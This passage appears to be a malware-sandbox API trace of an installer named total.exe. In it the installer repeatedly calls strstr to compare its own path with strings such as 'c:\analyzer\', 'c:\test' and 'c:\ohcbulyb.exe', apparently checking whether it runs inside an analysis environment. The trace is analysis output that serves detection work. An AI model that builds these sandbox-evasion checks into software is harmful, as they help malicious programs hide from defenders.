returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.898] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.898] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.898] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.898] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.898] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.898] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.898] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.898] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.899] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.899] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: 
"c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.900] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\file')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\file')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\file')i.R0 ?c" [0157.900] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.900] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.900] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.900] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.900] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.900] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.900] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.900] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.900] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.900] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\file", iMaxLength=1024 | out: lpString1="c:\\file") returned="c:\\file" [0157.900] GetModuleHandleA (lpModuleName="ntdll") returned 
0x77d30000 [0157.901] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.901] lstrlenA (lpString="strstr") returned 6 [0157.901] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.901] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.901] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.901] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\file", iMaxLength=1024 | out: lpString1="c:\\file") returned="c:\\file" [0157.901] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.901] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\file") returned 0x0 [0157.901] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\file", iMaxLength=1024 | out: lpString1="c:\\file") returned="c:\\file" [0157.901] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.901] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.901] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.901] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.901] lstrlenA (lpString="0") returned 1 [0157.901] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: 
lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.901] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.901] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.901] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.901] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.901] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.901] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.901] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.902] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.902] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.902] CreateFileA 
(lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.902] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\analyzer\\')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\analyzer\\')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\analyzer\\')i.R0 ?c" [0157.902] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.902] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.902] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.902] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.902] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.902] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.902] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.902] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.902] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.902] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\analyzer\\", 
iMaxLength=1024 | out: lpString1="c:\\analyzer\\") returned="c:\\analyzer\\" [0157.902] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.903] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.903] lstrlenA (lpString="strstr") returned 6 [0157.903] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.903] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.903] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.903] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\analyzer\\", iMaxLength=1024 | out: lpString1="c:\\analyzer\\") returned="c:\\analyzer\\" [0157.903] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.903] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\analyzer\\") returned 0x0 [0157.903] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\analyzer\\", iMaxLength=1024 | out: lpString1="c:\\analyzer\\") returned="c:\\analyzer\\" [0157.903] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.903] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.903] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.903] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.903] 
lstrlenA (lpString="0") returned 1 [0157.903] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.903] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.903] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.903] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.903] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.903] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.903] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.903] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.904] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.904] GetFileAttributesA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" 
(normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.904] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.904] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\test')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\test')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\test')i.R0 ?c" [0157.904] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.904] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.904] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.904] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.904] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.904] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.904] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.904] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.904] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: 
lpString1="strstr") returned="strstr" [0157.904] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\test", iMaxLength=1024 | out: lpString1="c:\\test") returned="c:\\test" [0157.904] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.905] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.905] lstrlenA (lpString="strstr") returned 6 [0157.905] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.905] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.905] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.905] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\test", iMaxLength=1024 | out: lpString1="c:\\test") returned="c:\\test" [0157.905] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.905] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\test") returned 0x0 [0157.905] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\test", iMaxLength=1024 | out: lpString1="c:\\test") returned="c:\\test" [0157.905] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.905] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 1 [0157.905] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.905] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", 
iMaxLength=1024 | out: lpString1="0") returned="0" [0157.905] lstrlenA (lpString="0") returned 1 [0157.905] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.905] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.905] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.905] lstrcpynA (in: lpString1=0x40b018, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.905] lstrcmpiA (lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", lpString2="") returned 1 [0157.905] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.905] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.906] lstrcpynA (in: lpString1=0x40b018, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.906] lstrcpynA (in: lpString1=0x40a418, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.906] GetFileAttributesA 
(lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll")) returned 0x2020 [0157.906] CreateFileA (lpFileName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" (normalized: "c:\\users\\adu0vk~1\\appdata\\local\\temp\\nstfdb0.tmp\\system.dll"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x2020, hTemplateFile=0x0) returned 0xffffffff [0157.906] lstrcpynA (in: lpString1=0x31441c, lpString2="ntdll::strstr(t R1, t 'c:\\ohcbulyb.exe')i.R0 ?c", iMaxLength=1024 | out: lpString1="ntdll::strstr(t R1, t 'c:\\ohcbulyb.exe')i.R0 ?c") returned="ntdll::strstr(t R1, t 'c:\\ohcbulyb.exe')i.R0 ?c" [0157.906] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.906] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.906] lstrcpynA (in: lpString1=0x40a818, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll" [0157.906] lstrcpynA (in: lpString1=0x40a418, lpString2="Call", iMaxLength=1024 | out: lpString1="Call") returned="Call" [0157.906] GetModuleHandleA (lpModuleName="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp\\System.dll") returned 0x75710000 [0157.907] GetProcAddress (hModule=0x75710000, lpProcName="Call") returned 0x757116df [0157.907] lstrcpyA (in: lpString1=0x3217a0, lpString2="ntdll" | out: lpString1="ntdll") returned="ntdll" [0157.907] lstrcpyA (in: lpString1=0x321bb0, lpString2="ntdll" | out: lpString1="ntdll") 
returned="ntdll" [0157.907] lstrcpyA (in: lpString1=0x321fb0, lpString2="strstr" | out: lpString1="strstr") returned="strstr" [0157.907] lstrcpynA (in: lpString1=0x323058, lpString2="c:\\ohcbulyb.exe", iMaxLength=1024 | out: lpString1="c:\\ohcbulyb.exe") returned="c:\\ohcbulyb.exe" [0157.907] GetModuleHandleA (lpModuleName="ntdll") returned 0x77d30000 [0157.907] GetProcAddress (hModule=0x77d30000, lpProcName="strstr") returned 0x77dac780 [0157.907] lstrlenA (lpString="strstr") returned 6 [0157.907] GetProcAddress (hModule=0x77d30000, lpProcName="strstrA") returned 0x0 [0157.907] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.907] lstrcpynA (in: lpString1=0x314418, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.908] lstrcpynA (in: lpString1=0x3217a0, lpString2="c:\\ohcbulyb.exe", iMaxLength=1024 | out: lpString1="c:\\ohcbulyb.exe") returned="c:\\ohcbulyb.exe" [0157.908] lstrcpynA (in: lpString1=0x314820, lpString2="", iMaxLength=1024 | out: lpString1="") returned="" [0157.908] strstr (_Str="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", _SubStr="c:\\ohcbulyb.exe") returned 0x0 [0157.908] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\ohcbulyb.exe", iMaxLength=1024 | out: lpString1="c:\\ohcbulyb.exe") returned="c:\\ohcbulyb.exe" [0157.908] lstrcpynA (in: lpString1=0x314820, lpString2="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe", iMaxLength=1024 | out: lpString1="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe") returned="c:\\users\\adu0vk~1\\appdata\\local\\temp\\total.exe" [0157.908] wsprintfA (in: param_1=0x314820, param_2="%d" | out: param_1="0") returned 
1 [0157.908] lstrcpyA (in: lpString1=0x432800, lpString2="0" | out: lpString1="0") returned="0" [0157.908] lstrcpynA (in: lpString1=0x42e3a0, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0157.908] lstrlenA (lpString="0") returned 1 [0157.908] lstrcpynA (in: lpString1=0x42e3a0, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp" [0157.908] lstrlenA (lpString="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") returned 48 [0157.908] lstrcpynA (in: lpString1=0x40ac18, lpString2="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp", iMaxLength=1024 | out: lpString1="C:\\Users\\ADU0VK~1\\AppData\\Local\\Temp\\nstFDB0.tmp") 